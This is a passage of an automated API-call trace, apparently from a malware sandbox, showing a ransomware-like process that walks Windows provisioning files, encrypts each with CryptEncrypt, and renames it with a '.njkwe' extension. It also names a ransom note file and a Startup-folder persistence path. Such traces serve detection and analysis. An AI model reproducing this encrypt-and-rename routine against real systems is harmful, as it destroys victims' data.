dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.733] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.733] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.733] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.733] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.733] CloseHandle (hObject=0x43c) returned 1 [0077.733] GetProcessHeap () returned 0xbe0000 [0077.733] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.733] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\259__Connections_Cellular_Maxis (Malaysia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0077.733] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\259__Connections_Cellular_Maxis (Malaysia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\259__connections_cellular_maxis (malaysia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\259__Connections_Cellular_Maxis (Malaysia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\259__connections_cellular_maxis (malaysia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.734] GetProcessHeap () returned 0xbe0000 [0077.734] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.734] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901892f8, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x901892f8, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x901892f8, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="25__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="25__CE~1.PRO")) returned 1 [0077.734] lstrcmpiW (lpString1="25__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0077.734] lstrcmpiW (lpString1="25__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0077.734] lstrcmpiW (lpString1="25__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0077.734] lstrcmpiW (lpString1="25__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0077.734] lstrcmpiW (lpString1="25__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0077.734] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\25__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 146 [0077.734] StrStrIW (lpFirst="25__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0077.734] lstrcmpW (lpString1="25__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.734] lstrcmpW (lpString1="25__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0077.734] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\25__Cellular_", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.734] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\25__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\25__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.734] GetTickCount () returned 0x1153c4a [0077.734] GetTickCount () returned 0x1153c4a [0077.734] GetTickCount () returned 0x1153c4a [0077.734] GetTickCount () returned 0x1153c4a [0077.734] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.735] GetProcessHeap () returned 0xbe0000 [0077.735] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.735] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0077.736] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.736] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0077.736] GetProcessHeap () returned 0xbe0000 [0077.736] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.736] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.736] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.737] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.737] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.737] CloseHandle (hObject=0x43c) returned 1 [0077.737] GetProcessHeap () returned 0xbe0000 [0077.737] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.737] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\25__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 166 [0077.737] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\25__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\25__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\25__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\25__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.738] GetProcessHeap () returned 0xbe0000 [0077.738] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.738] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x909bb812, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x909bb812, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x909bb812, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x300, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="260__Connections_Cellular_Maxis (Malaysia)_i1$(__MVID)@WAP.provxml", cAlternateFileName="260__C~1.PRO")) returned 1 [0077.738] lstrcmpiW (lpString1="260__Connections_Cellular_Maxis (Malaysia)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.738] lstrcmpiW (lpString1="260__Connections_Cellular_Maxis (Malaysia)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.738] lstrcmpiW (lpString1="260__Connections_Cellular_Maxis (Malaysia)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.738] lstrcmpiW (lpString1="260__Connections_Cellular_Maxis (Malaysia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.738] lstrcmpiW (lpString1="260__Connections_Cellular_Maxis (Malaysia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.738] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\260__Connections_Cellular_Maxis (Malaysia)_i1$(__MVID)@WAP.provxml") returned 160 [0077.738] StrStrIW (lpFirst="260__Connections_Cellular_Maxis (Malaysia)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.738] lstrcmpW (lpString1="260__Connections_Cellular_Maxis (Malaysia)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.738] lstrcmpW (lpString1="260__Connections_Cellular_Maxis (Malaysia)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.738] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\260__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.738] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\260__Connections_Cellular_Maxis (Malaysia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\260__connections_cellular_maxis (malaysia)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.738] GetTickCount () returned 0x1153c4a [0077.738] GetTickCount () returned 0x1153c4a [0077.738] GetTickCount () returned 0x1153c4a [0077.738] GetTickCount () returned 0x1153c4a [0077.739] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.739] GetProcessHeap () returned 0xbe0000 [0077.739] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.739] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.740] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.740] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.740] GetProcessHeap () returned 0xbe0000 [0077.740] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.740] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.740] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.740] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.741] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.741] CloseHandle (hObject=0x43c) returned 1 [0077.741] GetProcessHeap () returned 0xbe0000 [0077.741] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.741] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\260__Connections_Cellular_Maxis (Malaysia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0077.741] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\260__Connections_Cellular_Maxis (Malaysia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\260__connections_cellular_maxis (malaysia)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\260__Connections_Cellular_Maxis (Malaysia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\260__connections_cellular_maxis (malaysia)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.741] GetProcessHeap () returned 0xbe0000 [0077.742] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.742] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x909bb812, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x909bb812, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x909bb812, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2bf, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="261__Connections_Cellular_Maxis (Malaysia)_i2$(__MVID)@WAP.provxml", cAlternateFileName="261__C~1.PRO")) returned 1 [0077.742] lstrcmpiW (lpString1="261__Connections_Cellular_Maxis (Malaysia)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.742] lstrcmpiW (lpString1="261__Connections_Cellular_Maxis (Malaysia)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.742] lstrcmpiW (lpString1="261__Connections_Cellular_Maxis (Malaysia)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.742] lstrcmpiW (lpString1="261__Connections_Cellular_Maxis (Malaysia)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.742] lstrcmpiW (lpString1="261__Connections_Cellular_Maxis (Malaysia)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.742] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\261__Connections_Cellular_Maxis (Malaysia)_i2$(__MVID)@WAP.provxml") returned 160 [0077.742] StrStrIW (lpFirst="261__Connections_Cellular_Maxis (Malaysia)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.742] lstrcmpW (lpString1="261__Connections_Cellular_Maxis (Malaysia)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.742] lstrcmpW (lpString1="261__Connections_Cellular_Maxis (Malaysia)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.742] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\261__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.742] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\261__Connections_Cellular_Maxis (Malaysia)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\261__connections_cellular_maxis (malaysia)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.742] GetTickCount () returned 0x1153c4a [0077.742] GetTickCount () returned 0x1153c4a [0077.742] GetTickCount () returned 0x1153c4a [0077.742] GetTickCount () returned 0x1153c4a [0077.742] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.742] GetProcessHeap () returned 0xbe0000 [0077.742] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.742] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2bf, lpOverlapped=0x0) returned 1 [0077.744] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd41, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.744] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2bf, lpOverlapped=0x0) returned 1 [0077.744] GetProcessHeap () returned 0xbe0000 [0077.744] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.744] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.744] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.744] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.744] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.744] CloseHandle (hObject=0x43c) returned 1 [0077.745] GetProcessHeap () returned 0xbe0000 [0077.745] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.745] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\261__Connections_Cellular_Maxis (Malaysia)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0077.745] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\261__Connections_Cellular_Maxis (Malaysia)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\261__connections_cellular_maxis (malaysia)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\261__Connections_Cellular_Maxis (Malaysia)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\261__connections_cellular_maxis (malaysia)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.745] GetProcessHeap () returned 0xbe0000 [0077.745] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.745] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x909e1a7e, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x909e1a7e, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x909e1a7e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="262__Connections_Cellular_Timecel (Malaysia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="262__C~1.PRO")) returned 1 [0077.745] lstrcmpiW (lpString1="262__Connections_Cellular_Timecel (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.745] lstrcmpiW (lpString1="262__Connections_Cellular_Timecel (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.746] lstrcmpiW (lpString1="262__Connections_Cellular_Timecel (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.746] lstrcmpiW (lpString1="262__Connections_Cellular_Timecel (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.746] lstrcmpiW (lpString1="262__Connections_Cellular_Timecel (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.746] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\262__Connections_Cellular_Timecel (Malaysia)_i0$(__MVID)@WAP.provxml") returned 162 [0077.746] StrStrIW (lpFirst="262__Connections_Cellular_Timecel (Malaysia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.746] lstrcmpW (lpString1="262__Connections_Cellular_Timecel (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.746] lstrcmpW (lpString1="262__Connections_Cellular_Timecel (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.746] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\262__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.746] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\262__Connections_Cellular_Timecel (Malaysia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\262__connections_cellular_timecel (malaysia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.746] GetTickCount () returned 0x1153c4a [0077.746] GetTickCount () returned 0x1153c4a [0077.746] GetTickCount () returned 0x1153c4a [0077.746] GetTickCount () returned 0x1153c4a [0077.746] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 